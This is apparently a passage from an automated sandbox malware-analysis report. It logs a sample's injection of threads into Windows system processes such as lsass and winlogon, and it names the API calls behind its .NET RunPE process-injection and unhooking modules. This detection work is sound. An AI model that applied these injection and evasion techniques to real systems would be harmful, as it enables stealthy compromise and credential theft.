Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241390CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139084B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413908814
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241393CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139384B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413938814
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E3CD80
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E384B0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002BCD7E38814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EA84B0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_0000026504EA8814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EACD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1AC84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1AC8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1ACCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CE84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1CE8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002A661308814
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE4CD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEE48814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A87F48814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F4CD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537A8814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537D8814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_0000016CE6538814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE65384B0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE653CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	46_2_000002295D568814
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D5684B0

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

38_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
